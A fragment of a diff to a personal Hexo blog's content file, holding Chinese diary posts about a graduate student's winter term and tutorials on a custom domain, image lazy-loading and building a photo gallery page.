    ​ 最后剩三天,整理下实验室吧,在 324 的生活要告一段落了。

    1.17

    定州!

    1.19

    ​ 爷润了。

    ]]>
    + 前言
            

    东湖公园
    东湖公园 东湖公园 银杏大道 银杏大道 古莲花池
    孔子像

    ​ 研二上结束了!来做一个超长的延时摄影吧!记录一下这个不一样的冬天🥰。

    ​ 如果把这个学期的每一天都看作宽度为 $16$ 像素的长条,那么整个学期就是一张 $2192\times 2192$ 的图片了。


    ​ 气候播报——全,直接从气象站里导表吧:保定市历史天气 (rp5.ru)福州市历史天气 (rp5.ru),然后一阵 py!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    import pandas as pd
    import matplotlib.pyplot as plt
    from datetime import datetime
    import seaborn as sns

    df = pd.read_excel(r'BD.xls', skiprows=6).rename_axis(None)
    time_list = df['当地时间 保定市'][::-1].tolist()
    time_list = [datetime.strptime(x, '%d.%m.%Y %H:%M') for x in time_list]
    temp_list = df['T'][::-1].tolist()

    df2 = pd.read_excel(r'FZ.xls', skiprows=6).rename_axis(None)
    time_list2 = df2['当地时间 福州市'][::-1].tolist()
    time_list2 = [datetime.strptime(x, '%d.%m.%Y %H:%M') for x in time_list2]
    temp_list2 = df2['T'][::-1].tolist()

    sns.set_style("whitegrid")
    plt.rcParams['font.family'] = 'SimHei'

    plt.plot(time_list, temp_list, label="保定")
    plt.plot(time_list2, temp_list2, label="福州")

    plt.xlabel('时间')
    plt.ylabel('温度')
    plt.xticks(time_list[::200])
    plt.legend()
    plt.show()

    全学期温度曲线

    正文

    1.8

    ​ 开始背诵滕王阁序!据说背完滕王阁序就可以免票进滕王阁。明天大早上跑去实验室,趁没人的时候背一段,一周时间大概背完了。

    豫章故郡,洪都新府

    ​ 比起《滕王阁序》里最有名的“落霞与孤鹜齐飞,秋水共长天一色”,我更喜欢后面的这句“关山难越,谁悲失路之人?萍水相逢,尽是他乡之客”。

    ​ 王勃在他二十四岁这年写出了这么优美的文章,而我二十四岁这年写屎一样的论文,喝汤一样😇。


    今天晚上七点在 326 开会,汇报一下近期工作和寒假安排,大家有什么需要说的提前准备好。

    ​ 这学期最后一次组会了!导师还请我们吃糖葫芦🥳。

    pro 神:✌

    1.9

    江西瓦罐汤

    ​ 品尝一下冀大的江西瓦罐汤,到时候看它是否正宗🤔。

    ​ 校园里陆陆续续地出现了拿着行李箱往外走的人,食堂的商铺也陆陆续续收工,寒假就要来到了!


    大家啥时候有时间,咋们啥时候一起吃个饭呀@全体成员

    ​ 临走前,实验室决定最后聚一次餐。

    那咱们就周五晚上,具体时间和地点我到时候再通知哈@全体成员

    1.12

    咕咾肉 西红柿疙瘩汤 大拌菜 豆腐煲 铁锅炖杂鱼 辣子鸡 锅包肘子 驴肉饼 烧鸡

    ​ 师兄挑了一家河北特色饭馆——淀里船宴 · 夜宴。我想这个淀是白洋淀的淀。

    • 点了一份咕咾肉,师弟居然说这道菜让他想起了荔枝肉?震惊我😧。
    • 点了一份辣子鸡,伟哥说这个辣子鸡一点都不辣,鸡肉麻花甚至辣椒都不辣!结果师兄吃了个辣椒直接呛飞😇。
    • 点了一份铁锅炖杂鱼,上面还贴着玉米饼,巨干。其他人觉得鱼太腥了,但我觉得还好,最关键是它很有白洋淀的特色🧐。
    • 还点了保定特色的驴肉!还有师兄至今不敢吃驴……感觉吃得比之前吃的驴肉都香🤗。

    蒋百里

    ​ 吃完后同门三人边走边聊天走回宿舍(pro 神翘掉了这次聚餐😭!)。

    ​ 又是一天雾霾天,逐渐也习惯了🙃。

    1.16

    拜拜 324!

    ​ 最后剩三天,整理下实验室吧,在 324 的生活要告一段落了。

    1.17

    定州!

    1.19

    ​ 爷润了。

    ]]>
    @@ -3476,7 +3476,7 @@ /posts/Hexo-%E7%BB%99%E5%8D%9A%E5%AE%A2%E6%8F%90%E6%8F%90%E9%80%9F%EF%BC%81/ - 正文

    换域名

    github.io 这个域名在冀大校园网会直接被墙(估计是 DNS 污染?),换个域名让冀大校园网里也能访问!

    webp

    ​ 买一个域名:gz-metal-cell.top

    ​ 要实名认证才可以使用!进去操作一番,直到审核通过域名可以解析为止。

    webp

    ​ 设置主机记录:

    webp

    pro 神这么说道:

    Github Page 提供了Custom domain 服务,

    username.github.io 仓库下 setting -> Pages ->Custom domain 填入域名blog.promefire.top。保存后会在根目录生成CNAME 文件,里面保存域名配置信息

    webp

    ​ 等待 DNS check successful,顺便把 Enforce HTTPS 也开了。

    ​ 仓库根目录就会创建一个 CNAME 文件,内容即为 blog.gz-metal-cell.top,这个文件在本地 source/ 下也转存一份,不然每次推送这个 CNAME 又会没了……

    webp

    ​ 现在,访问 https://gz-metal-cell.github.io 会自动跳转至 https://blog.gz-metal-cell.top/,就可以绕开冀大的防火墙了,真是太棒了!

    图片懒加载

    pro 神这么说道:

    ​ 懒加载又称延迟加载。开启后,当图片或评论插件滚动到可见范围内才会加载,可以大幅提高打开网页的速度。

    1.新增hexo-lazyload-image模块

    npm install hexo-lazyload-image --save

    2.在主目录配置文件_config.yml增加配置

    # 图片懒加载
    lazyload:
    enable: true
    onlypost: false # optional
    loadingImg: /images/loading.webp # optional eg ./images/loading.gif
    isSPA: false # optional
    preloadRatio: 5 # optional, default is 1

    ​ 从 loading GIF 图片生成 loading GIF 图片 在线 loading 图片制作工具 intoGIF 整一个 loading 的 gif,再 PS 调一调,再 GIF 转 WEBP - 在线转换图像文件 (aconvert.com) 转成 webp 格式,看起来不错,只要 12 KB!

    webp

    ​ 进主题,把图标啥的小图片打上 no-lazy 标签,我们并不需要懒加载这些内容:

    <img no-lazy src="XXX" />

    与 Masonry 冲突

    ​ 解决一下懒加载与 Masonry · Layout (desandro.com) 布局的冲突,原本是这么处理的:

    // layout Masonry after each image loads
    $grid.imagesLoaded().progress(function() {
    $grid.masonry();
    });

    ​ 改成:

    window.imageLazyLoadSetting = {
    onImageLoaded: function() {
    $grid.masonry();
    }
    };

    ​ 这样懒加载就能与瀑布流插件 Masonry 所兼容!

    与 fancybox 冲突

    ​ 这个插件的原理是把 imgsrc 改成 data-original,因此需要修改创建 fancybox 的逻辑:

    $('#article img').each(function () {
    if ($(this).parent().hasClass('fancybox')) return;
    if ($(this).hasClass('no-fancybox')) return;
    var alt = this.alt;
    $(this).wrap(
    '<a ' +
    'class="fancybox"' +
    'href="' + ($(this).attr('data-original') == null ? this.src : $(this).attr('data-original')) +
    '"data-caption="' + alt + '"' +
    'data-fancybox="gallery"' +
    'data-thumb='+ ($(this).attr('data-original') == null ? this.src :$(this).attr('data-original')) + '>' +
    '</a>');
    });

    其他工具

    ​ ChatGPT 这么说道:

    要使用 Python 将 PNG 文件转换为 WebP 格式,你可以使用 Pillow 库。请确保你已经安装了 Pillow 库。

    以下是一个简单的示例代码:

    from PIL import Image

    def convert_png_to_webp(input_path, output_path):
    # 打开 PNG 文件
    image = Image.open(input_path)

    # 将 PNG 文件转换为 WebP 格式
    image.save(output_path, "webp")

    # 调用函数进行转换
    convert_png_to_webp("input.png", "output.webp")

    在上面的代码中,convert_png_to_webp 函数接受输入路径(PNG 文件)和输出路径(WebP 文件),并将 PNG 文件转换为 WebP 格式。

    请注意,使用 WebP 格式需要安装 libwebp 库。如果你在使用 Pillow 之前没有安装 libwebp 库,你可能会遇到错误。你可以根据你的操作系统和 Python 版本选择合适的安装方法。

    pro 神这么说道:

    ]]>
    + 正文

    换域名

    github.io 这个域名在冀大校园网会直接被墙(估计是 DNS 污染?),换个域名让冀大校园网里也能访问!

    webp

    ​ 买一个域名:gz-metal-cell.top

    ​ 要实名认证才可以使用!进去操作一番,直到审核通过域名可以解析为止。

    webp

    ​ 设置主机记录:

    webp

    pro 神这么说道:

    Github Page 提供了Custom domain 服务,

    username.github.io 仓库下 setting -> Pages ->Custom domain 填入域名blog.promefire.top。保存后会在根目录生成CNAME 文件,里面保存域名配置信息

    webp

    ​ 等待 DNS check successful,顺便把 Enforce HTTPS 也开了。

    ​ 仓库根目录就会创建一个 CNAME 文件,内容即为 blog.gz-metal-cell.top,这个文件在本地 source/ 下也转存一份,不然每次推送这个 CNAME 又会没了……

    webp

    ​ 现在,访问 https://gz-metal-cell.github.io 会自动跳转至 https://blog.gz-metal-cell.top/,就可以绕开冀大的防火墙了,真是太棒了!

    图片懒加载

    pro 神这么说道:

    ​ 懒加载又称延迟加载。开启后,当图片或评论插件滚动到可见范围内才会加载,可以大幅提高打开网页的速度。

    1.新增hexo-lazyload-image模块

    1
    npm install hexo-lazyload-image --save

    2.在主目录配置文件_config.yml增加配置

    1
    2
    3
    4
    5
    6
    7
    # 图片懒加载
    lazyload:
    enable: true
    onlypost: false # optional
    loadingImg: /images/loading.webp # optional eg ./images/loading.gif
    isSPA: false # optional
    preloadRatio: 5 # optional, default is 1

    ​ 从 loading GIF 图片生成 loading GIF 图片 在线 loading 图片制作工具 intoGIF 整一个 loading 的 gif,再 PS 调一调,再 GIF 转 WEBP - 在线转换图像文件 (aconvert.com) 转成 webp 格式,看起来不错,只要 12 KB!

    webp

    ​ 进主题,把图标啥的小图片打上 no-lazy 标签,我们并不需要懒加载这些内容:

    1
    <img no-lazy src="XXX" />

    与 Masonry 冲突

    ​ 解决一下懒加载与 Masonry · Layout (desandro.com) 布局的冲突,原本是这么处理的:

    1
    2
    3
    4
    // layout Masonry after each image loads
    $grid.imagesLoaded().progress(function() {
    $grid.masonry();
    });

    ​ 改成:

    1
    2
    3
    4
    5
    window.imageLazyLoadSetting = {
    onImageLoaded: function() {
    $grid.masonry();
    }
    };

    ​ 这样懒加载就能与瀑布流插件 Masonry 所兼容!

    与 fancybox 冲突

    ​ 这个插件的原理是把 imgsrc 改成 data-original,因此需要修改创建 fancybox 的逻辑:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    $('#article img').each(function () {
    if ($(this).parent().hasClass('fancybox')) return;
    if ($(this).hasClass('no-fancybox')) return;
    var alt = this.alt;
    $(this).wrap(
    '<a ' +
    'class="fancybox"' +
    'href="' + ($(this).attr('data-original') == null ? this.src : $(this).attr('data-original')) +
    '"data-caption="' + alt + '"' +
    'data-fancybox="gallery"' +
    'data-thumb='+ ($(this).attr('data-original') == null ? this.src :$(this).attr('data-original')) + '>' +
    '</a>');
    });

    其他工具

    ​ ChatGPT 这么说道:

    要使用 Python 将 PNG 文件转换为 WebP 格式,你可以使用 Pillow 库。请确保你已经安装了 Pillow 库。

    以下是一个简单的示例代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    from PIL import Image

    def convert_png_to_webp(input_path, output_path):
    # 打开 PNG 文件
    image = Image.open(input_path)

    # 将 PNG 文件转换为 WebP 格式
    image.save(output_path, "webp")

    # 调用函数进行转换
    convert_png_to_webp("input.png", "output.webp")

    在上面的代码中,convert_png_to_webp 函数接受输入路径(PNG 文件)和输出路径(WebP 文件),并将 PNG 文件转换为 WebP 格式。

    请注意,使用 WebP 格式需要安装 libwebp 库。如果你在使用 Pillow 之前没有安装 libwebp 库,你可能会遇到错误。你可以根据你的操作系统和 Python 版本选择合适的安装方法。

    pro 神这么说道:

    ]]>
    @@ -3528,7 +3528,7 @@ /posts/Diary-9-%E5%80%92%E4%BA%8C/ - 前言
            

    jpg

    梧桐与银杏

    ​ 这是这学期倒二篇周记了!坚持住!勇士!相信圣光会在最需要你的时候显现🤩🤩🤩!

    ​ 保定气候播报:

    正文

    12.28

    ​ 想着给自己的博客增加更多实用的功能,看了下隔壁 promefire 的博客,决定抄一些牛逼的功能回去,开扒😍😍😍!扒得 promefire 脸都绿了。

    png

    promefire: 😻😻😻😱

    12.30

    ​ 一觉醒来,雾凇沆砀。准确来讲,我觉得应该是霾凇🙃。

    ​ 一年中最冷的时候已经过去了!

    jpg

    千树万树梨花开

    ​ 雾凇,也称树挂或雾冻,是一种在天气寒冷的地方出现的白色不透明晶体。在寒冷的北方,临近地表水的地方,由于水从湖面蒸发,在空中形成水雾,而又因为寒冷的空气,雾中的水粒子在树枝上凝结、结霜并不断积聚,树枝披上了由小冰晶组成的白色不透明的外衣,产生了类似雪后的景观,非常美丽,犹如梨花盛开。雾凇一词最早出现于南北朝时代南朝宋吕忱所编的《字林》里,其解释为:“寒气结冰如珠见日光乃消,齐鲁谓之雾凇。”

    ​ 树枝上长满了白色的针刺,但是摸起来细细软软的。

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    ​ 东湖公园开了冰雪嘉年华,有点像颐和园湖上的各种滑冰项目。

    jpg

    冰雪嘉年华

    ​ 灯笼寓意着新年即将来到了,再见 2023!

    jpg

    新年的气氛

    jpg

    嘻嘻哈哈项目

    12.31

    ​ 跨年夜到了,这将是在北方第一次过的公历新年😇。

    ​ 去未来石看看北方特色打铁花。

    jpg

    开封打铁花

    ​ 舍友在永辉买了红酒和烧鸡,打算庆祝一番。

    不错不错

    特别篇——舞台剧——《笨蛋 promefire 买酒不买开瓶器》

    红酒与烧鸡
    jpg

    ​ 这是一个美好的跨年夜,年轻的凡哥和杰哥买来一瓶红酒和一份烧鸡,决定开始享受这个夜晚。看看这瓶美丽的红酒!它散发着诱人的深红色泽,仿佛一匹醉人的夕阳染红了整个酒瓶。再看看这份迷人的烧鸡,它饱满的金黄色皮肤反射着温暖的灯光,令人联想起柔软的麦田与夏日的太阳。

    插在酒瓶上的筷子
    jpg

    ​ 在这个令人扼腕的时刻,年轻的凡哥和杰哥突然意识到他们忘了买开瓶器。面对这一窘境,他们的眉头紧锁,眼神闪烁着无奈和焦急。然而,他们不愿放弃享受美酒的机会,心生一计。凡哥毅然拿出手中的筷子,坚定地插入软木塞中,决心用自己的“智慧”打开这瓶扣人心弦的红酒。

    识图将筷子锤下
    jpg

    ​ 软木塞和玻璃瓶身之间似乎形成了一道无法逾越的鸿沟,阻挡着红酒的主人品尝美酒的机会。凡哥拿出一把锤子,试图将筷子砸穿软木塞。但是,这个方法也没有奏效。

    大力出奇迹!
    jpg

    ​ 筷子被软木塞卡住,就连拔出它都变得困难。凡哥决定采取更加强力的方式,用尽全力将筷子拔出,可是依然不成功。

    又一根筷子
    jpg

    ​ 凡哥选择插入了第二根筷子!然而不幸的是,第二根筷子也插在了软木塞上拔不出来!这简直糟糕透了,比隔壁本杰明老爷爷的旧轮胎还要糟糕。他们意识到这个问题比他们想象的更加棘手。

    算球吧最后还是砸碎了
    jpg

    ​ 年轻的凡哥和杰哥感到非常失望和沮丧,但仍然不想放弃。于是,凡哥决定采用一种更激进的方法来打开酒瓶。凡哥用力将瓶口向墙壁撞击。经过多次努力,瓶口终于被打碎了。虽然这并不是最理想的方法,但他们最终还是成功地品尝到了这瓶美酒,而且在这个过程中也锻炼了自己的“毅力”和“创造力”。

    阳哥:我谢谢你
    jpg

    ​ 这真是个令人尴尬的情节。看来凡哥和杰哥的幸运并不持久。他们正在享受美酒时,关某不慎将红酒洒在桌子上,整个桌面都被染上了红色。这突如其来的意外无疑给愉快的氛围蒙上了一层阴影。或许他们会笑着解决这个问题,毕竟美好的时光不应该因为一点小事而被打扰。

    美酒
    jpg

    ​ 收拾完桌面上的红酒,他们决定不再让这个小意外影响他们的心情。他们取出干净的酒杯,重新倒满红酒。尽管桌子上曾经一片混乱,但现在他们围坐在一起,准备享用这份美酒。
    ​ 他们举起酒杯,相互祝福,并感激这样难得的时刻。他们轻轻品味着红酒的香气,让酒液在舌尖舒展开来。随着酒液在口中流淌,他们感受到了红酒的浓郁和复杂的口感。喝下每一口,他们的味蕾都得到了满足,心情也逐渐变得愉悦起来。

    这真是一个艺术品!
    jpg

    ​ 破碎的瓶口上仍塞着软木塞,那根筷子依然笔直地立在那里。真傻逼啊!


    氛围感顿时就没了

    1.1

    ​ 新年好!宿舍躺一天!

    1.5

    跟伟哥私奔了

    ​ 该买票回去了!

    ​ 石家庄飞福州的时间点看上去都不是很好,于是决定中转一下南昌,去打卡江南三大名楼(2 / 3),冲!

    赣了
    又可以吃赣面了

    1.6

    ​ 记录一下吃小笼包还要蘸辣酱的阳哥😇。阳哥还说区区江西南昌,根本不算辣。

    jpg

    这才是黑暗料理!

    ​ 晚上是琪琪的生日 Party,祝琪琪生日快乐!

    ​ 琪琪还因为我特意点了些不辣的,感动捏🥰。我与吃辣的阳哥势不两立😡!

    jpg

    永远童真🤭

    jpg

    654 抽象三人组

    ​ 酒店还特意准备了生日 Party,找了个财神爷跳科目三。

    jpg

    怎么会有人拿板面当长寿面?
    ]]>
    + 前言
            

    jpg

    梧桐与银杏

    ​ 这是这学期倒二篇周记了!坚持住!勇士!相信圣光会在最需要你的时候显现🤩🤩🤩!

    ​ 保定气候播报:

    正文

    12.28

    ​ 想着给自己的博客增加更多实用的功能,看了下隔壁 promefire 的博客,决定抄一些牛逼的功能回去,开扒😍😍😍!扒得 promefire 脸都绿了。

    png

    promefire: 😻😻😻😱

    12.30

    ​ 一觉醒来,雾凇沆砀。准确来讲,我觉得应该是霾凇🙃。

    ​ 一年中最冷的时候已经过去了!

    jpg

    千树万树梨花开

    ​ 雾凇,也称树挂或雾冻,是一种在天气寒冷的地方出现的白色不透明晶体。在寒冷的北方,临近地表水的地方,由于水从湖面蒸发,在空中形成水雾,而又因为寒冷的空气,雾中的水粒子在树枝上凝结、结霜并不断积聚,树枝披上了由小冰晶组成的白色不透明的外衣,产生了类似雪后的景观,非常美丽,犹如梨花盛开。雾凇一词最早出现于南北朝时代南朝宋吕忱所编的《字林》里,其解释为:“寒气结冰如珠见日光乃消,齐鲁谓之雾凇。”

    ​ 树枝上长满了白色的针刺,但是摸起来细细软软的。

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    ​ 东湖公园开了冰雪嘉年华,有点像颐和园湖上的各种滑冰项目。

    jpg

    冰雪嘉年华

    ​ 灯笼寓意着新年即将来到了,再见 2023!

    jpg

    新年的气氛

    jpg

    嘻嘻哈哈项目

    12.31

    ​ 跨年夜到了,这将是在北方第一次过的公历新年😇。

    ​ 去未来石看看北方特色打铁花。

    jpg

    开封打铁花

    ​ 舍友在永辉买了红酒和烧鸡,打算庆祝一番。

    不错不错

    特别篇——舞台剧——《笨蛋 promefire 买酒不买开瓶器》

    红酒与烧鸡
    jpg

    ​ 这是一个美好的跨年夜,年轻的凡哥和杰哥买来一瓶红酒和一份烧鸡,决定开始享受这个夜晚。看看这瓶美丽的红酒!它散发着诱人的深红色泽,仿佛一匹醉人的夕阳染红了整个酒瓶。再看看这份迷人的烧鸡,它饱满的金黄色皮肤反射着温暖的灯光,令人联想起柔软的麦田与夏日的太阳。

    插在酒瓶上的筷子
    jpg

    ​ 在这个令人扼腕的时刻,年轻的凡哥和杰哥突然意识到他们忘了买开瓶器。面对这一窘境,他们的眉头紧锁,眼神闪烁着无奈和焦急。然而,他们不愿放弃享受美酒的机会,心生一计。凡哥毅然拿出手中的筷子,坚定地插入软木塞中,决心用自己的“智慧”打开这瓶扣人心弦的红酒。

    识图将筷子锤下
    jpg

    ​ 软木塞和玻璃瓶身之间似乎形成了一道无法逾越的鸿沟,阻挡着红酒的主人品尝美酒的机会。凡哥拿出一把锤子,试图将筷子砸穿软木塞。但是,这个方法也没有奏效。

    大力出奇迹!
    jpg

    ​ 筷子被软木塞卡住,就连拔出它都变得困难。凡哥决定采取更加强力的方式,用尽全力将筷子拔出,可是依然不成功。

    又一根筷子
    jpg

    ​ 凡哥选择插入了第二根筷子!然而不幸的是,第二根筷子也插在了软木塞上拔不出来!这简直糟糕透了,比隔壁本杰明老爷爷的旧轮胎还要糟糕。他们意识到这个问题比他们想象的更加棘手。

    算球吧最后还是砸碎了
    jpg

    ​ 年轻的凡哥和杰哥感到非常失望和沮丧,但仍然不想放弃。于是,凡哥决定采用一种更激进的方法来打开酒瓶。凡哥用力将瓶口向墙壁撞击。经过多次努力,瓶口终于被打碎了。虽然这并不是最理想的方法,但他们最终还是成功地品尝到了这瓶美酒,而且在这个过程中也锻炼了自己的“毅力”和“创造力”。

    阳哥:我谢谢你
    jpg

    ​ 这真是个令人尴尬的情节。看来凡哥和杰哥的幸运并不持久。他们正在享受美酒时,关某不慎将红酒洒在桌子上,整个桌面都被染上了红色。这突如其来的意外无疑给愉快的氛围蒙上了一层阴影。或许他们会笑着解决这个问题,毕竟美好的时光不应该因为一点小事而被打扰。

    美酒
    jpg

    ​ 收拾完桌面上的红酒,他们决定不再让这个小意外影响他们的心情。他们取出干净的酒杯,重新倒满红酒。尽管桌子上曾经一片混乱,但现在他们围坐在一起,准备享用这份美酒。
    ​ 他们举起酒杯,相互祝福,并感激这样难得的时刻。他们轻轻品味着红酒的香气,让酒液在舌尖舒展开来。随着酒液在口中流淌,他们感受到了红酒的浓郁和复杂的口感。喝下每一口,他们的味蕾都得到了满足,心情也逐渐变得愉悦起来。

    这真是一个艺术品!
    jpg

    ​ 破碎的瓶口上仍塞着软木塞,那根筷子依然笔直地立在那里。真傻逼啊!


    氛围感顿时就没了

    1.1

    ​ 新年好!宿舍躺一天!

    1.5

    跟伟哥私奔了

    ​ 该买票回去了!

    ​ 石家庄飞福州的时间点看上去都不是很好,于是决定中转一下南昌,去打卡江南三大名楼(2 / 3),冲!

    赣了
    又可以吃赣面了

    1.6

    ​ 记录一下吃小笼包还要蘸辣酱的阳哥😇。阳哥还说区区江西南昌,根本不算辣。

    jpg

    这才是黑暗料理!

    ​ 晚上是琪琪的生日 Party,祝琪琪生日快乐!

    ​ 琪琪还因为我特意点了些不辣的,感动捏🥰。我与吃辣的阳哥势不两立😡!

    jpg

    永远童真🤭

    jpg

    654 抽象三人组

    ​ 酒店还特意准备了生日 Party,找了个财神爷跳科目三。

    jpg

    怎么会有人拿板面当长寿面?
    ]]>
    @@ -3555,7 +3555,7 @@ /posts/Hexo-%E5%8D%9A%E5%AE%A2%E7%9B%B8%E5%86%8C%E5%8A%9F%E8%83%BD%E7%9A%84%E5%BC%80%E5%8F%91/ - 前言

    ​ 拍的照片多了,设计一个相册功能便于更直观地展示拍的各种好看的照片😇!


    ​ 参考资料:

    正文

    子链接的创建

    ​ 在 hexo 项目的 source 文件中,新建一个 galleries 文件夹,再在里面放上 index.md(可以使用命令行),

    hexo new page gallery

    ​ 渲染博客的时候就会渲染 /galleries 这个网址,如 相册-Zi-Zi’s Journey

    png

    ​ 同样地,如果在 galleries 里放上其它文件夹,文件夹里再放上 index.md,渲染博客的时候就会再渲染下一级的网址,如:…/…/…/…/galleries/研究生 。

    png

    ​ 继续套娃,套到相册(layout 为 gallery)为止:

    png

    相册的入口

    ​ 设置好了子链接就要设置好入口,一般在主题的 _config.yml 中配置。

    # 导航名称
    menus_title:
    home: 主页
    archives: 统计
    categories: 类别
    tags: 标签
    galleries: 相册
    links: 链接
    about: 关于

    # 导航
    menus:
    home: /
    archives: /archives
    categories: /categories
    tags: /tags
    galleries: /galleries
    links: /links
    about: /about

    ​ 渲染博客,导航栏就多了一项 相册,且点进去能够正确转入 /galleries

    png

    ​ 其它有关页面的参数也设置一下:

    # 每个页面的展示的图标和一句话
    headers:
    home: {
    message: "居然被你找到了这里!",
    icon: "/images/logo.png",
    cover: "#f5f9fd"
    }
    archives: {
    # 这里会替换掉两个变量{ year 年,number 总数 } 当然也可以不写这两个变量
    message: "居然用了 year 年一共才写了 number 篇文章!",
    icon: "/images/archives.svg",
    cover: "#f5f9fd"
    }
    categories: {
    message: "好像也没分几类",
    icon: "/images/categories.svg",
    cover: "#f5f9fd"
    }
    tags: {
    message: "这里是一些展示的标签",
    icon: "/images/tags.svg",
    cover: "#f5f9fd"
    }
    galleries: {
    message: "有趣的相册~(施工中)",
    icon: "/images/galleries.svg",
    cover: "#f5f9fd"
    }
    links: {
    message: "给我读过的学校递一杯卡布奇诺~",
    icon: "/images/links.svg",
    cover: "#f5f9fd"
    }

    ​ 手撸一个风格相近的图标:

    png

    创建相册页面的布局

    ​ 编辑创建的 index.md,头部信息是由 yaml 语法组成的:

    title: 相册
    date: 2023-12-29 09:46:29
    type: galleries
    layout: galleries

    ​ 以自己所用主题为例,这表示这个网页页面布局将使用 galleries 渲染。

    ​ 我设计了两种页面:

    • galleries 用于展示相册
    • gallery 用于展示相册里的图片

    ​ 在主题对应的文件夹里创建 galleries.ejsgallery.ejs,页面就会按照对应的 .ejs 文件渲染:

    png

    galleries 设计

    index.md

    ​ 给使用 layoutgalleriesindex.md 设计变量,这些变量在galleries.ejs 中会以 page.XXX 的形式读取:

    title: 相册
    date: 2023-12-29 09:46:29
    type: galleries
    layout: galleries
    layout_style: block
    comments: false
    galleries:
    - {title: "研究生", description: "Tell me 他乡的困难会不会比它鼓山高?", cover: "/images/gallery_covers/研究生.jpg"}
    - {title: "本科", description: "闽江江水都流向,流向长乐的海……", cover: "/images/gallery_covers/本科.jpg"}
    - {title: "小时候", description: "我让过去的自己只留在,安静的白马河。", cover: "/images/gallery_covers/小时候.jpg"}
    • title 标题
    • date 时间,但在这里我并没用到
    • type 页面属性
    • layout 布局属性
    • layout_style 布局风格,我这里设计了两种风格 blockcard
    • galleries 相册列表,列表里的内容必须符合子文件夹的属性(我没有想到如何自动遍历子文件夹并获取相关参数的办法,只能这手动档了。)
      • title 相册标题
      • description 相册描述
      • cover 相册封面
      • cover_style 我这里没设置,可以控制封面图片的 style
    • comments 是否打开评论功能

    galleries.ejs

    galleries.ejs 的内容参考如下:(修改 galleries.ejs 的内容要重新生成博客才可以重新渲染,如果调试不方便,可以将代码以 <%- partial('_partial/XXX' %> 跳转到其他地方以便于调试)

    <%- partial('_partial/header',{name:'galleries'}) %>

    <div class="galleries">
    <%- partial('_widget/header_body',{message: page.headers ? page.headers : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
    <div class="main">
    <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>" id="content">
    <% page.galleries.forEach(function(item) { %>
    <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>-content">
    <a class="img-container" href="<%= item.title %>">
    <div class="photo-frames">
    <img style="<%- item.cover_style || '' %>" src="<%= item.cover ? item.cover : theme.default_cover %>" alt="Cover">
    </div>
    <p class="title"><%= item.title %></p>
    </a>
    <div class="description-container"><p><%= item.description %></p></div>
    </div>
    <% }); %>
    <div id="gitalk-container"></div>
    </div>
    </div>
    </div>

    ​ 就是将读取到信息展示在页面上的逻辑。

    galleries.less

    ​ 创建并编写对应的 galleries.less 如下(记得在一个地方引用):

    .galleries{
    .main {
    display: flex;
    flex-grow: 1;
    flex-basis: auto;
    flex-direction: column;
    margin-top: -64px;
    .post-block{
    padding: 0 calc((100% - 1160px)/2);
    margin-bottom: 50px;
    &-content{
    margin: 20px 100px 60px 100px;
    text-decoration: none;
    height: 240px;
    justify-content: center; /* 添加此行以实现水平居中对齐 */
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
    grid-gap: 10px; /* 控制子容器之间的间距 */
    position: relative;
    top: 0px;
    transition: all .5s ease-in-out;
    -moz-transition: all .5s;
    -webkit-transition: all .5s;
    -o-transition: all .5s;
    &:hover {
    top: -15px;
    }
    .img-container{
    justify-content: center;
    display: flex;
    transform: rotate(-5deg);
    transition: transform ease-in-out 0.5s;
    &:hover {
    transform: rotate(-10deg);
    }
    .photo-frames{
    width: 200px;
    border: 10px solid #FFF; /* 相框的边框样式和颜色 */
    border-radius: 5px;
    background: #FFF;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
    img{
    border-radius: 2px;
    margin-top: 10px;
    width: 100%;
    height: 75%;
    object-fit: cover;
    }
    }
    }
    .title{
    bottom: 15px;
    position: absolute;
    font-weight: bold;
    text-decoration: none;
    color: @textColorTheme;
    font-size: 22px;
    font-weight: 500;
    }
    .description-container{
    margin-top: 80px;
    p{
    text-indent: 2em;
    font-size: 20px;
    position: absolute;
    }
    }
    }
    @media screen and (max-width:660px) {
    &-content{
    margin: 20px;
    padding: 20px;
    .title{
    bottom: 5%;
    }
    .description-container{
    p{
    font-size: 18px;
    }
    }
    }
    }
    @media screen and (max-width:489px) {
    &-content{
    height: 320px;
    margin-bottom: 40px;
    .img-container{
    .photo-frames{
    width: 60vw;
    }
    }
    .description-container{
    margin-top: 40px;
    }
    }
    }
    }

    .post-card{
    display: flex;
    max-width: 100%;
    padding: 0 calc((100% - 1200px)/2) 40px;
    flex-wrap: wrap;
    justify-content: center;
    align-items: stretch;
    margin-top: -64px;
    &-content{
    margin: 20px 40px 80px 40px;
    text-decoration: none;
    height: 400px;
    justify-content: center; /* 添加此行以实现水平居中对齐 */
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
    grid-gap: 10px; /* 控制子容器之间的间距 */
    position: relative;
    top: 0px;
    transition: all .5s ease-in-out;
    -moz-transition: all .5s;
    -webkit-transition: all .5s;
    -o-transition: all .5s;
    &:hover {
    top: -15px;
    }
    .img-container{
    justify-content: center;
    display: flex;
    transform: rotate(-5deg);
    transition: transform ease-in-out 0.5s;
    &:hover {
    transform: rotate(-10deg);
    }
    .photo-frames{
    width: 220px;
    border: 10px solid #FFF; /* 相框的边框样式和颜色 */
    border-radius: 5px;
    background: #FFF;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
    img{
    border-radius: 2px;
    margin-top: 10px;
    width: 100%;
    height: 75%;
    object-fit: cover;
    }
    }
    }
    .title{
    bottom: 20px;
    position: absolute;
    font-weight: bold;
    text-decoration: none;
    color: @textColorTheme;
    font-size: 22px;
    font-weight: 500;
    }
    .description-container{
    margin-top: 40px;
    p{
    text-indent: 2em;
    font-size: 20px;
    position: absolute;
    }
    }
    }

    @media screen and (max-width:640px) {
    &-content{
    margin: 80px 20px;
    padding: 20px;
    height: 400px;
    .title{
    bottom: 5%;
    }
    .img-container{
    .photo-frames{
